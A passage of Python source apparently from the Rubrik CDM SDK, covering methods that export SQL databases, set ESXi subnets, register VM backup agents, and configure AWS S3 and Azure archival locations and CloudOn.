    # a stale `replica` variable, returning wrong data; this loop fixes that.
    if instance is None and hostname is None:
        return databases['data']
    result = []
    for item in databases['data']:
        if hostname is not None and item['rootProperties']['rootName'] != hostname:
            continue
        if instance is None:
            result.append(item)
            continue
        # Databases that carry no replica information simply do not match.
        for replica in item.get('replicas', []):
            if replica.get('instanceName') == instance:
                result.append(item)
                break
    return result
def get_sql_db_files(self, db_name, date, time, sql_instance=None, sql_host=None, timeout=15):  # pylint: ignore
    """Provides a list of database files to be restored for the specified restore or export operation. The Data, Log and Filestream files will be retrieved along with name and path information.
    Arguments:
        db_name {str} -- The name of the database.
        date {str} -- The recovery_point date formated as 'Month-Date-Year' (ex: 8-9-2018).
        time {str} -- The recovery_point time formated as `Hour:Minute` (ex: 3:30 AM).
    Keyword Arguments:
        sql_instance {str} -- The SQL instance name with the database.
        sql_host {str} -- The SQL Host of the database/instance.
        timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
    Returns:
        list -- The full response of `GET /internal/mssql/db/{id}/restore_files?time={recovery_point}`.
    Raises:
        InvalidParameterException -- When no recovery point exists at the requested date and time.
    """
    if self.function_name == "":
        self.function_name = inspect.currentframe().f_code.co_name

    mssql_id = self._validate_sql_db(db_name, sql_instance, sql_host)

    # Normalize the user-supplied date/time into the ISO-8601 timestamp the
    # API expects as its `time` query parameter.
    recovery_date_time = self._date_time_conversion(date, time)
    recovery_point = datetime.strptime(
        recovery_date_time, '%Y-%m-%dT%H:%M').isoformat()

    # `valid_recovery_point` is always bound here, so the original
    # try/except NameError wrapper was dead code and has been removed.
    valid_recovery_point = self._validate_sql_recovery_point(
        mssql_id, date, time)
    if valid_recovery_point['is_recovery_point'] is False:
        raise InvalidParameterException(
            "The database '{}' does not have a recovery_point taken on {} at {}.".format(
                db_name, date, time))

    self.log(
        "get_sql_db_files: Getting SQL database '{}' files for recovery_point {} {}.".format(
            db_name,
            date,
            time))
    return self.get('internal', '/mssql/db/{}/restore_files?time={}'.format(mssql_id, recovery_point), timeout)
def sql_db_export(self, db_name, date, time, sql_instance=None, sql_host=None, target_instance_name=None, target_hostname=None, target_database_name=None, target_data_file_path=None, target_log_file_path=None, target_file_paths=None, finish_recovery=True, max_data_streams=2, allow_overwrite=False, timeout=15):  # pylint: ignore
    """Export an SQL database from a specified recovery point to a target SQL Instance and Host. Requires database data and log file name directory paths.
    Arguments:
        db_name {str} -- The name of the database to be exported.
        date {str} -- The recovery_point date formated as 'Month-Date-Year' (ex: 8-9-2018).
        time {str} -- The recovery_point time formated as `Hour:Minute` (ex: 3:30 AM).
    Keyword Arguments:
        sql_instance {str} -- The SQL instance name with the database to be exported.
        sql_host {str} -- The SQL Host of the database/instance to be exported.
        target_instance_name {str} -- Name of the Microsoft SQL instance for the new database.
        target_hostname {str} -- Name of the Microsoft SQL host for the new database.
        target_database_name {str} -- Name of the new database.
        target_data_file_path {str} -- The target path to store all data files.
        target_log_file_path {str} -- The target path to store all log files.
        target_file_paths {list} -- A list of dictionary objects each with key value pairs: {'logicalName': 'Logical name of the database file', 'exportPath': 'The target path for the database file', 'newLogicalName': 'New logical name for the database file', 'newFilename': 'New filename for the database file'}. One target path for each individual database file. Overrides targetDataFilePath and targetLogFilePath.
        finish_recovery {str} -- A Boolean value that determines the recovery option to use during database restore. When this value is 'true', the database is restored using the RECOVERY option and is fully functional at the end of the restore operation. When this value is 'false', the database is restored using the NORECOVERY option and remains in recovering mode at the end of the restore operation.
        max_data_streams {str} -- Maximum number of parallel data streams that can be used to copy data to the target system.
        allow_overwrite {str} -- A Boolean value that determines whether an existing database can be overwritten by a database this is exported from a backup. Set to false to prevent overwrites. This is the default. Set to true to allow overwrites.
        timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
    Returns:
        dict -- The full response of `POST /v1/mssql/db/{id}/export`.
    Raises:
        InvalidParameterException -- When target file paths are incomplete, the target instance does not exist, or no recovery point exists at the requested date and time.
    """
    self.function_name = inspect.currentframe().f_code.co_name

    # Either per-file target paths or both directory-level paths must be given.
    if target_file_paths is None:
        if target_data_file_path is None or target_log_file_path is None:
            raise InvalidParameterException(
                "The 'target_data_file_path' and 'target_log_file_path' parameters must be provided if a 'target_file_paths' dictionary list is not provided.")

    mssql_id = self._validate_sql_db(db_name, sql_instance, sql_host)
    recovery_point = self._validate_sql_recovery_point(
        mssql_id, date, time)

    target_host_id = self.object_id(
        target_hostname, 'physical_host', timeout=timeout)

    self.log("sql_db_export: Getting the instances on target host {}.".format(
        target_hostname))
    mssql_instance = self.get(
        'v1', '/mssql/instance?primary_cluster_id=local&root_id={}'.format(target_host_id), timeout=timeout)
    # for/else: the else branch fires only when no instance matched.
    for instance in mssql_instance['data']:
        if instance['name'] == target_instance_name:
            target_instance_id = instance['id']
            break
    else:
        raise InvalidParameterException(
            "The target SQL instance {} does not exist, please provide a valid target instance".format(target_instance_name))

    # `recovery_point` is always bound here, so the original
    # try/except NameError wrapper was dead code and has been removed.
    if recovery_point['is_recovery_point'] is False:
        raise InvalidParameterException(
            "The database '{}' does not have a recovery_point taken on {} at {}.".format(
                db_name, date, time))

    config = {}
    config['recoveryPoint'] = {
        'timestampMs': recovery_point['recovery_timestamp']}
    config['targetInstanceId'] = target_instance_id
    config['targetDatabaseName'] = target_database_name
    # Per-file paths, when supplied, override the directory-level paths.
    if target_file_paths is not None:
        config['targetFilePaths'] = target_file_paths
    else:
        config['targetDataFilePath'] = target_data_file_path
        config['targetLogFilePath'] = target_log_file_path
    config['finishRecovery'] = finish_recovery
    config['maxDataStreams'] = max_data_streams
    config['allowOverwrite'] = allow_overwrite

    self.log(
        "sql_db_export: Exporting the database '{}' from recovery_point on {} at {} with new name '{}'.".format(
            db_name,
            date,
            time,
            target_database_name))
    return self.post('v1', '/mssql/db/{}/export'.format(mssql_id), config, timeout)
def set_esxi_subnets(self, esx_subnets=None, timeout=15):  # pylint: ignore
    """Sets the subnets that should be used to reach the ESXi hosts.
    Keyword Arguments:
        esx_subnets {list} -- Preferred subnets used to reach the ESX hosts.
        timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
    Returns:
        str -- No change required when the provided subnet list matches the existing configuration.
        dict -- The full response of `PATCH /internal/vmware/config/set_esx_subnets`.
    Raises:
        InvalidParameterException -- When `esx_subnets` is missing or is not a list.
    """
    # Validate the input before making any API call (the original fetched
    # the current subnets first and only then rejected bad input).
    if esx_subnets is None:
        raise InvalidParameterException(
            "The 'esx_subnets' parameter must be provided.")
    if not isinstance(esx_subnets, list):
        raise InvalidParameterException(
            "The provided 'esx_subnets' parameter is not a list.")

    self.log(
        "set_esx_subnets: Getting the existing subnets used to reach the ESXi hosts")
    # The API stores the subnets as a single comma-separated string.
    subnets = (self.get_esxi_subnets())['esxSubnets'].split(',')

    # Idempotency check: no PATCH when nothing would change.
    if subnets == esx_subnets:
        return "No change required. The subnet list provided is the same as the existing values: {}.".format(
            subnets)

    config = {}
    config['esxSubnets'] = ','.join(esx_subnets)
    self.log(
        "set_esx_subnets: Setting the subnets that should be used to reach the ESXi hosts: '{}'.".format(
            esx_subnets))
    return self.patch('internal', '/vmware/config/set_esx_subnets', config, timeout)
def get_esxi_subnets(self, timeout=15):  # pylint: ignore
    """Return the preferred subnets the cluster uses to reach the ESXi hosts.

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})

    Returns:
        dict -- The full response of `GET /internal/vmware/config/esx_subnets`.
    """
    log_message = "get_esx_subnets: Retrieving the preferred subnets used to reach the ESXi hosts."
    self.log(log_message)
    subnet_endpoint = '/vmware/config/esx_subnets'
    return self.get('internal', subnet_endpoint, timeout)
def get_all_hosts(self, timeout=15):
    """Fetch summary information for every host connected to the Rubrik cluster.

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})

    Returns:
        dict -- The result of the API call `GET /v1/host`
    """
    log_message = 'get_all_hosts: Getting information for each host on the Rubrik cluster.'
    self.log(log_message)
    host_endpoint = '/host'
    return self.get('v1', host_endpoint, timeout=timeout)
def register_vm(self, name, timeout=15):
    """Register the Rubrik Backup Service on a vSphere VM.
    Arguments:
        name {str} -- The name of the vSphere VM.
    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
    Returns:
        str -- No change required. The VM `name` is already registered.
        dict -- The result of the call for `POST /v1/vmware/vm/{id}/register_agent`.
    """
    vm_id = self.object_id(name, 'vmware', timeout=timeout)
    # Fixed garbled log message (was "Determining if the agent state of the VM. ]").
    self.log('register_vm: Determining the agent state of the VM.')
    # Pass the caller-supplied timeout through; the original dropped it here.
    vm_details = self.get("v1", "/vmware/vm/{}".format(vm_id), timeout=timeout)
    # Idempotency check: skip the POST if the RBS agent is already registered.
    if vm_details["isAgentRegistered"] is True:
        return "No change required. The VM {} is already registered.".format(name)
    self.log('register_vm: Registering the RBS agent.')
    return self.post('v1', '/vmware/vm/{}/register_agent'.format(vm_id), {}, timeout=timeout)
import os
import re
from .api import Api
from .exceptions import InvalidParameterException, CDMVersionException, InvalidTypeException
import inspect
class Cloud(Api):
"""This class contains methods for the managment of Cloud related functionality on the Rubrik cluster."""
def aws_s3_cloudout(self, aws_bucket_name, archive_name='default', aws_region=None, aws_access_key=None, aws_secret_key=None, kms_master_key_id=None, rsa_key=None, storage_class='standard', timeout=180):  # pylint: ignore
    """Add a new AWS S3 archival location to the Rubrik cluster.
    Arguments:
        aws_bucket_name {str} -- The name of the AWS S3 bucket you wish to use as an archive target. The bucket name will automatically have all whitespace removed, all letters lowercased, and can not contain any of the following characters: `_\/*?%.:\|<>`.
    Keyword Arguments:
        aws_region {str} -- The name of the AWS region where the bucket is located. If set to the default `None` keyword argument, we will look for a `AWS_DEFAULT_REGION` environment variable to pull the value from. (default: {None}) (choices: {ap-south-1, ap-northeast-2, ap-southeast-1, ap-southeast-2, ap-northeast-1, ca-central-1, cn-north-1, cn-northwest-1, eu-central-1, eu-west-1, eu-west-2, eu-west-3, sa-east-1, us-gov-west-1, us-west-1, us-east-1, us-east-2, us-west-2})
        aws_access_key {str} -- The access key of a AWS account with the required permissions. If set to the default `None` keyword argument, we will look for a `AWS_ACCESS_KEY_ID` environment variable to pull the value from. (default: {None})
        aws_secret_key {str} -- The secret key of a AWS account with the required permissions. If set to the default `None` keyword argument, we will look for a `AWS_SECRET_ACCESS_KEY` environment variable to pull the value from. (default: {None})
        kms_master_key_id {str} -- The AWS KMS master key ID that will be used to encrypt the archive data. If set to the default `None` keyword argument, you will need to provide a `rsa_key` instead. (default: {None})
        rsa_key {str} -- The RSA key that will be used to encrypt the archive data. A key can be generated through `openssl genrsa -out rubrik_encryption_key.pem 2048`. If set to the default `None` keyword argument, you will need to provide a `kms_master_key_id` instead. (default: {None})
        archive_name {str} -- The name of the archive location used in the Rubrik GUI. If set to 'default' the following naming convention will be used: "AWS:S3:`aws_bucket_name`" (default: {'default'})
        storage_class {str} -- The AWS storage class you wish to use. (default: {'standard'}) (choices: {standard, 'standard_ia, reduced_redundancy, onezone_ia})
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {180})
    Returns:
        str -- No change required. The '`name`' archival location is already configured on the Rubrik cluster.
        dict -- The full API response for `POST /internal/archive/object_store`.
    """
    # Record this public entry point for SDK logging.
    self.function_name = inspect.currentframe().f_code.co_name
    # AWS regions accepted by the cluster as archive targets.
    valid_aws_regions = [
        'ap-south-1',
        'ap-northeast-2',
        'ap-southeast-1',
        'ap-southeast-2',
        'ap-northeast-1',
        'ca-central-1',
        'cn-north-1',
        'cn-northwest-1',
        'eu-central-1',
        'eu-west-1',
        'eu-west-2',
        'eu-west-3',
        'sa-east-1',
        'us-gov-west-1',
        'us-west-1',
        'us-east-1',
        'us-east-2',
        'us-west-2']
    # Accepted storage classes (validated in lower case, sent in upper case).
    valid_storage_classes = [
        'standard',
        'standard_ia',
        'reduced_redundancy',
        'onezone_ia']
    # Reject bucket names containing characters the archive API disallows.
    if re.compile(r'[_\/*?%.:|<>]').findall(aws_bucket_name):
        raise InvalidParameterException(
            r"The `aws_bucket_name` may not contain any of the following characters: _\/*?%.:|<>")
    # Fall back to the standard AWS environment variables when the region
    # and credentials are not passed in explicitly.
    if aws_region is None:
        aws_region = os.environ.get('AWS_DEFAULT_REGION')
        if aws_region is None:
            raise InvalidParameterException("`aws_region` has not been provided.")
    if aws_access_key is None:
        aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
        if aws_access_key is None:
            raise InvalidParameterException("`aws_access_key` has not been provided.")
    if aws_secret_key is None:
        aws_secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
        if aws_secret_key is None:
            raise InvalidParameterException("`aws_secret_key` has not been provided.")
    if aws_region not in valid_aws_regions:
        raise InvalidParameterException('The `aws_region` must be one of the following: {}'.format(
            valid_aws_regions))
    if storage_class not in valid_storage_classes:
        raise InvalidParameterException('The `storage_class` must be one of the following: {}'.format(
            valid_storage_classes))
    else:
        # The archive API expects the storage class in upper case.
        storage_class = storage_class.upper()
    # Default naming convention: "AWS:S3:<normalized bucket name>".
    if archive_name == 'default':
        archive_name = 'AWS:S3:{}'.format(aws_bucket_name.lower().strip())
    # Exactly one encryption mechanism (KMS key or RSA key) must be given.
    if kms_master_key_id is None and rsa_key is None:
        raise InvalidParameterException(
            "You must populated either `kms_master_key_id` or `rsa_key`.")
    elif kms_master_key_id is not None and rsa_key is not None:
        raise InvalidParameterException(
            "Both `kms_master_key_id` or `rsa_key` have been populated. You may only use one.")
    # Existing archival locations, used below for the idempotency check.
    archives_on_cluster = self.get('internal', '/archive/object_store', timeout=timeout)
    # Full POST payload for the new archival location.
    config = {}
    config['name'] = archive_name
    config['bucket'] = aws_bucket_name.lower().strip()
    config['defaultRegion'] = aws_region
    config['storageClass'] = storage_class
    config['accessKey'] = aws_access_key
    config['secretKey'] = aws_secret_key
    if kms_master_key_id:
        config['kmsMasterKeyId'] = kms_master_key_id
    elif rsa_key:
        config['pemFileContent'] = rsa_key
    config['objectStoreType'] = 'S3'
    # Create a new dictionary that includes only the values returned by
    # archives_on_cluster. Secret fields (secretKey, kmsMasterKeyId,
    # pemFileContent) are omitted -- presumably the GET endpoint never
    # echoes them back, so they cannot be compared (TODO confirm).
    redacted_archive_definition = {}
    redacted_archive_definition['objectStoreType'] = 'S3'
    redacted_archive_definition['name'] = archive_name
    redacted_archive_definition['accessKey'] = aws_access_key
    redacted_archive_definition['bucket'] = aws_bucket_name.lower().strip()
    redacted_archive_definition['defaultRegion'] = aws_region
    redacted_archive_definition['storageClass'] = storage_class
    for archive in archives_on_cluster['data']:
        # If present, remove the Cloud On Configuration for comparison
        # (these keys only exist once CloudOn has been enabled).
        archive_definition = archive['definition']
        for value in ["encryptionType", "defaultComputeNetworkConfig",
                      "isComputeEnabled", "isConsolidationEnabled"]:
            try:
                del archive_definition[value]
            except BaseException:
                pass
        # Idempotency: an archive with an identical definition already exists.
        if archive_definition == redacted_archive_definition:
            return "No change required. The '{}' archival location is already configured on the Rubrik cluster.".format(
                archive_name)
        # Same name but different settings: refuse to create a duplicate.
        if archive['definition']['objectStoreType'] == 'S3' and archive['definition']['name'] == archive_name:
            raise InvalidParameterException(
                "Archival location with name '{}' already exists. Please enter a unique `archive_name`.".format(archive_name))
    self.log("aws_s3_cloudout: Creating the AWS S3 archive location.")
    return self.post('internal', '/archive/object_store', config, timeout)
def update_aws_s3_cloudout(self, current_archive_name, new_archive_name=None, aws_access_key=None, aws_secret_key=None, storage_class=None, timeout=180):  # pylint: ignore
    """Update an AWS S3 archival location on the Rubrik cluster.
    Keyword Arguments:
        current_archive_name {str} -- The name of the current archive to be updated.
        new_archive_name {str} -- Desired name for the updated archive location. If set to default `None` keyword argument, no change will be made. (default: {None})
        aws_access_key {str} -- The access key of a AWS account with the required permissions. If set to the default `None` keyword argument, no change will be made. (default: {None})
        aws_secret_key {str} -- The secret key of a AWS account with the required permissions. If set to the default `None` keyword argument, no change will be made. (default: {None})
        storage_class {str} -- The AWS storage class you wish to use. If set to the default `None` keyword argument, no change will be made. (default: {None}) (choices: {standard, 'standard_ia, reduced_redundancy, onezone_ia})
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {180})
    Returns:
        dict -- The full API response for `PATCH /internal/archive/object_store/{id}'`.
    Raises:
        InvalidParameterException -- When `storage_class` is invalid or no matching S3 archival location exists.
    """
    self.function_name = inspect.currentframe().f_code.co_name

    valid_storage_classes = [
        'standard',
        'standard_ia',
        'reduced_redundancy',
        'onezone_ia']
    if storage_class is not None and storage_class not in valid_storage_classes:
        raise InvalidParameterException(
            'The `storage_class` must be one of the following: {}'.format(valid_storage_classes))

    update_config = None
    archive_id = None
    self.log("update_aws_s3_cloudout: Searching the Rubrik cluster for S3 archival locations named {}.".format(
        current_archive_name))
    archives_on_cluster = self.get('internal', '/archive/object_store', timeout=timeout)
    for archive in archives_on_cluster['data']:
        archive_definition = archive['definition']
        if archive_definition['objectStoreType'] == 'S3' and archive_definition['name'] == current_archive_name:
            self.log("update_aws_s3_cloudout: Found matching S3 archival location named {}.".format(current_archive_name))
            # The CloudOn compute configuration is not part of an update
            # payload, so strip it from the fetched definition before
            # reusing it. Only the matching archive is touched (the
            # original mutated every archive's definition).
            archive_definition.pop('defaultComputeNetworkConfig', None)
            update_config = archive_definition
            archive_id = archive['id']
            # Stop at the first match instead of letting a later entry win.
            break
    if update_config is None:
        raise InvalidParameterException(
            "No S3 archival location with name '{}' exists.".format(current_archive_name))

    # Apply only the fields the caller asked to change.
    if new_archive_name:
        update_config['name'] = new_archive_name
    if aws_access_key:
        update_config['accessKey'] = aws_access_key
    if aws_secret_key:
        update_config['secretKey'] = aws_secret_key
    if storage_class:
        # The archive API expects the storage class in upper case.
        update_config['storageClass'] = storage_class.upper()

    self.log("update_aws_s3_cloudout: Updating the AWS S3 archive location named {}.".format(current_archive_name))
    return self.patch('internal', '/archive/object_store/{}'.format(archive_id), update_config, timeout)
def aws_s3_cloudon(self, archive_name, vpc_id, subnet_id, security_group_id, enable_archive_consolidation=False, timeout=30):
    """Enable CloudOn for an exsiting AWS S3 archival location.
    Arguments:
        archive_name {str} -- The name of the archive location used in the Rubrik GUI.
        vpc_id {str} -- The AWS VPC ID used by Rubrik cluster to launch a temporary Rubrik instance in AWS for instantiation.
        subnet_id {str} -- The AWS Subnet ID used by Rubrik cluster to launch a temporary Rubrik instance in AWS for instantiation.
        security_group_id {str} -- The AWS Security Group ID used by Rubrik cluster to launch a temporary Rubrik instance in AWS for instantiation.
    Keyword Arguments:
        enable_archive_consolidation {bool} - Flag that determines whether archive consolidation is enabled. (default: {False})
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
    Returns:
        str -- No change required. The '`name`' archival location is already configured on the Rubrik cluster.
        dict -- The full API response for `PATCH /internal/archive/object_store/{id}`.
    """
    # Record this public entry point for SDK logging.
    self.function_name = inspect.currentframe().f_code.co_name
    if not isinstance(enable_archive_consolidation, bool):
        raise InvalidTypeException("The enable_archive_consolidation value must a boolean value (True or False).")
    self.log("aws_s3_cloudon: Searching the Rubrik cluster for archival locations.")
    archives_on_cluster = self.get('internal', '/archive/object_store', timeout=timeout)
    # Partial PATCH payload: only the CloudOn compute network settings and
    # the consolidation flag are sent.
    config = {}
    config['defaultComputeNetworkConfig'] = {}
    config['defaultComputeNetworkConfig']['subnetId'] = subnet_id
    config['defaultComputeNetworkConfig']['vNetId'] = vpc_id
    config['defaultComputeNetworkConfig']['securityGroupId'] = security_group_id
    config['isConsolidationEnabled'] = enable_archive_consolidation
    for archive in archives_on_cluster['data']:
        if archive['definition']['objectStoreType'] == 'S3' and archive['definition']['name'] == archive_name:
            # If present, remove the Cloud On configuration for proper
            # comparison
            try:
                # Idempotency: nothing to do when the archive already has the
                # requested network config and consolidation setting.
                if archive['definition']['defaultComputeNetworkConfig'] == config['defaultComputeNetworkConfig'] and archive['definition']['isConsolidationEnabled'] == config['isConsolidationEnabled']:
                    return "No change required. The '{}' archival location is already configured for CloudOn.".format(
                        archive_name)
                if archive['definition']['defaultComputeNetworkConfig'] != config['defaultComputeNetworkConfig']:
                    self.log("aws_s3_cloudon: Updating the archive location Cloud Compute network settings.")
                    return self.patch('internal', "/archive/object_store/{}".format(archive['id']), config, timeout)
                if archive['definition']['isConsolidationEnabled'] != config['isConsolidationEnabled']:
                    self.log("aws_s3_cloudon: Updating the archive location Cloud Compute consolidation settings.")
                    return self.patch('internal', "/archive/object_store/{}".format(archive['id']), config, timeout)
            except KeyError:
                # The definition has no CloudOn keys yet, i.e. CloudOn was
                # never enabled for this archive: apply the full config.
                self.log("aws_s3_cloudon: Updating the archive location for CloudOn.")
                return self.patch('internal', "/archive/object_store/{}".format(archive['id']), config, timeout)
    raise InvalidParameterException(
        "The Rubrik cluster does not have an archive location named '{}'.".format(archive_name))
def azure_cloudout(self, container, azure_access_key, storage_account_name, rsa_key, archive_name='default', instance_type='default', timeout=180):  # pylint: ignore
    r"""Add a new Azure archival location to the Rubrik cluster.

    Arguments:
        container {str} -- The name of the Azure storage container you wish to use as an archive. The container name will automatically be lowercased and can not contain any of the following characters: `_\/*?%.:\|<>`.
        azure_access_key {str} -- The access key for the Azure storage account.
        storage_account_name {str} -- The name of the Storage Account that the `container` belongs to.
        rsa_key {str} -- The RSA key that will be used to encrypt the archive data. A key can be generated through `openssl genrsa -out rubrik_encryption_key.pem 2048`.

    Keyword Arguments:
        archive_name {str} -- The name of the archive location used in the Rubrik GUI. If set to `default`, the following naming convention will be used: "Azure:`container`" (default: {'default'})
        instance_type {str} -- The Cloud Platform type of the archival location. (default: {'default'}) (choices: {'default', 'china', 'germany', 'government'})
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {180})

    Returns:
        str -- No change required. The '`name`' archival location is already configured on the Rubrik cluster.
        dict -- The full API response for `POST /internal/archive/object_store`.
    """

    self.function_name = inspect.currentframe().f_code.co_name

    container = container.lower()

    # Azure storage container names may not contain these characters.
    if re.compile(r'[_\/*?%.:|<>]').findall(container):
        raise InvalidParameterException(
            r"The `container` may not contain any of the following characters: _\/*?%.:|<>")

    valid_instance_types = ['default', 'china', 'germany', 'government']

    if instance_type not in valid_instance_types:
        raise InvalidParameterException('The `instance_type` argument must be one of the following: {}'.format(
            valid_instance_types))

    if archive_name == 'default':
        archive_name = 'Azure:{}'.format(container)

    self.log("azure_cloudout: Searching the Rubrik cluster for archival locations.")
    archives_on_cluster = self.get('internal', '/archive/object_store', timeout=timeout)

    # Sovereign/government clouds use a non-default storage endpoint.
    instance_type_endpoint = {
        'government': 'core.usgovcloudapi.net',
        'germany': 'core.cloudapi.de',
        'china': 'core.chinacloudapi.cn',
    }

    config = {}
    config['name'] = archive_name
    config['bucket'] = container
    config['accessKey'] = storage_account_name
    config['secretKey'] = azure_access_key
    config['pemFileContent'] = rsa_key
    config['objectStoreType'] = 'Azure'
    if instance_type in instance_type_endpoint:
        config['endpoint'] = instance_type_endpoint[instance_type]

    # Build a dictionary that includes only the values returned by the GET
    # /internal/archive/object_store call so an equality comparison is possible
    # (the API never returns the secretKey or pemFileContent fields).
    redacted_archive_definition = {}
    redacted_archive_definition['objectStoreType'] = 'Azure'
    redacted_archive_definition['name'] = archive_name
    redacted_archive_definition['accessKey'] = storage_account_name
    redacted_archive_definition['bucket'] = container
    if instance_type in instance_type_endpoint:
        redacted_archive_definition['endpoint'] = instance_type_endpoint[instance_type]

    for archive in archives_on_cluster['data']:
        # If present, remove the CloudOn configuration for comparison.
        archive_definition = archive['definition']
        for value in ["encryptionType", "defaultComputeNetworkConfig",
                      "isComputeEnabled", "isConsolidationEnabled", "azureComputeSummary"]:
            # Only a missing key is expected here; anything else should surface.
            try:
                del archive_definition[value]
            except KeyError:
                pass

        if archive_definition == redacted_archive_definition:
            return "No change required. The '{}' archival location is already configured on the Rubrik cluster.".format(
                archive_name)

        if archive_definition['objectStoreType'] == 'Azure' and archive_definition['name'] == archive_name:
            raise InvalidParameterException("Archival location with name '{}' already exists. Please enter a unique `name`.".format(
                archive_name))

    self.log("azure_cloudout: Creating the Azure archive location.")
    # Pass the user supplied timeout through to the API call (previously omitted).
    return self.post('internal', '/archive/object_store', config, timeout)
def azure_cloudon(self, archive_name, container, storage_account_name, application_id, application_key, tenant_id, region, virtual_network_id, subnet_name, security_group_id, timeout=30):  # pylint: ignore
    r"""Enable CloudOn for an existing Azure archival location.

    Arguments:
        archive_name {str} -- The name of the archive location used in the Rubrik GUI.
        container {str} -- The name of the Azure storage container being used as the archive target. The container name will automatically be lowercased and can not contain any of the following characters: `_\/*?%.:\|<>`.
        storage_account_name {str} -- The name of the Storage Account that the `container` belongs to.
        application_id {str} -- The ID of the application registered in Azure Active Directory.
        application_key {str} -- The key of the application registered in Azure Active Directory.
        tenant_id {str} -- The tenant ID, also known as the directory ID, found under the Azure Active Directory properties.
        region {str} -- The name of the Azure region where the `container` is located. (choices: {westus, westus2, centralus, eastus, eastus2, northcentralus, southcentralus, westcentralus, canadacentral, canadaeast, brazilsouth, northeurope, westeurope, uksouth, ukwest, eastasia, southeastasia, japaneast, japanwest, australiaeast australiasoutheast, centralindia, southindia, westindia, koreacentral, koreasouth})
        virtual_network_id {str} -- The Azure virtual network ID used by Rubrik cluster to launch a temporary Rubrik instance in Azure for instantiation.
        subnet_name {str} -- The Azure subnet name used by Rubrik cluster to launch a temporary Rubrik instance in Azure for instantiation.
        security_group_id {str} -- The Azure Security Group ID used by Rubrik cluster to launch a temporary Rubrik instance in Azure for instantiation.

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})

    Returns:
        str -- No change required. The '`archive_name`' archival location is already configured for CloudOn.
        dict -- The full API response for `PATCH /internal/archive/object_store/{id}`.
    """

    self.function_name = inspect.currentframe().f_code.co_name

    valid_regions = [
        "westus",
        "westus2",
        "centralus",
        "eastus",
        "eastus2",
        "northcentralus",
        "southcentralus",
        "westcentralus",
        "canadacentral",
        "canadaeast",
        "brazilsouth",
        "northeurope",
        "westeurope",
        "uksouth",
        "ukwest",
        "eastasia",
        "southeastasia",
        "japaneast",
        "japanwest",
        "australiaeast",
        "australiasoutheast",
        "centralindia",
        "southindia",
        "westindia",
        "koreacentral",
        "koreasouth"]

    if region not in valid_regions:
        raise InvalidParameterException('The `region` must be one of the following: {}'.format(valid_regions))

    # The subscription ID is embedded in the ARM resource ID:
    # /subscriptions/<subscription_id>/resourceGroups/... -- validate the shape
    # up front instead of raising a bare IndexError below.
    vnet_id_components = virtual_network_id.split("/")
    if len(vnet_id_components) < 3:
        raise InvalidParameterException(
            "The `virtual_network_id` must be a full Azure resource ID (i.e. /subscriptions/<subscription_id>/...).")
    subscription_id = vnet_id_components[2]

    self.log("azure_cloudon: Searching the Rubrik cluster for archival locations.")
    archives_on_cluster = self.get('internal', '/archive/object_store', timeout=timeout)

    # Shared sub-documents used by both the PATCH payload and the
    # desired-state comparison below.
    azure_compute_summary = {
        "tenantId": tenant_id,
        "subscriptionId": subscription_id,
        "clientId": application_id,
        "region": region,
        "generalPurposeStorageAccountName": storage_account_name,
        "containerName": container,
    }
    default_compute_network_config = {
        'subnetId': subnet_name,
        'vNetId': virtual_network_id,
        'securityGroupId': security_group_id,
    }

    config = {}
    config['name'] = archive_name
    config['objectStoreType'] = 'Azure'
    config['isComputeEnabled'] = True
    config['azureComputeSummary'] = dict(azure_compute_summary)
    # The client secret is write-only; it is never returned by the API.
    config['azureComputeSecret'] = {'clientSecret': application_key}
    config['defaultComputeNetworkConfig'] = dict(default_compute_network_config)

    # Dictionary containing only the (redacted) values returned by the GET
    # call, so an equality comparison against the current definition works.
    redacted_archive_definition = {}
    redacted_archive_definition['name'] = archive_name
    redacted_archive_definition['objectStoreType'] = "Azure"
    redacted_archive_definition['accessKey'] = storage_account_name
    redacted_archive_definition['bucket'] = container
    redacted_archive_definition['isComputeEnabled'] = True
    redacted_archive_definition['azureComputeSummary'] = dict(azure_compute_summary)
    redacted_archive_definition['defaultComputeNetworkConfig'] = dict(default_compute_network_config)

    for archive in archives_on_cluster['data']:
        archive_definition = archive['definition']
        # Strip fields that are not part of the desired-state comparison.
        for value in ["isConsolidationEnabled", "encryptionType"]:
            try:
                del archive_definition[value]
            except KeyError:
                pass
        # The nested documents may be absent (KeyError) or null (TypeError)
        # on archives that have never had CloudOn configured.
        try:
            del archive_definition["azureComputeSummary"]["environment"]
        except (KeyError, TypeError):
            pass
        try:
            del archive_definition["defaultComputeNetworkConfig"]["resourceGroupId"]
        except (KeyError, TypeError):
            pass

        if archive_definition['objectStoreType'] == 'Azure' and archive_definition['name'] == archive_name:
            if archive_definition == redacted_archive_definition:
                return "No change required. The '{}' archival location is already configured for CloudOn.".format(
                    archive_name)

            self.log("azure_cloudon: Updating the archive location for CloudOn.")
            return self.patch('internal', "/archive/object_store/{}".format(archive['id']), config, timeout)

    raise InvalidParameterException(
        "The Rubrik cluster does not have an archive location named '{}'.".format(archive_name))
def add_aws_native_account(self, aws_account_name, aws_access_key=None, aws_secret_key=None, aws_regions=None, regional_bolt_network_configs=None, timeout=30):  # pylint: ignore
    """Add a new AWS account to EC2 native protection on the Rubrik cluster.

    Arguments:
        aws_account_name {str} -- The name of the AWS account you wish to protect. This is the name that will be displayed in the Rubrik UI.

    Keyword Arguments:
